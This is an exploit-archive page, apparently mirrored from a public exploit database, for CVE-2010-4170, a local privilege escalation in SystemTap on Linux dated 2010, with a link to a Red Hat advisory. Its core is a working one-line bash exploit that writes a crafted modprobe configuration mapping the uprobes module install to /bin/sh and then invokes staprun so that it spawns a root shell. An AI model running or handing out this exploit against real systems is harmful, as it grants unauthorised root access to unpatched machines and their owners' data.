Skip to content
cyberexploits
locallinuxbash

SystemTap - Privilege Escalation

SystemTap - Privilege Escalation

Publié le 2010-11-26

Code source

Épinglé au commit 7eac4c3a2ce5
bashplatforms/linux/local/15620.sh7eac4c3a
raw
CVE-2010-4170

printf "install uprobes /bin/sh" > exploit.conf; MODPROBE_OPTIONS="-C exploit.conf" staprun -u whatever


RHEL Advisory:
https://rhn.redhat.com/errata/RHSA-2010-0894.html
Voir sur GitHub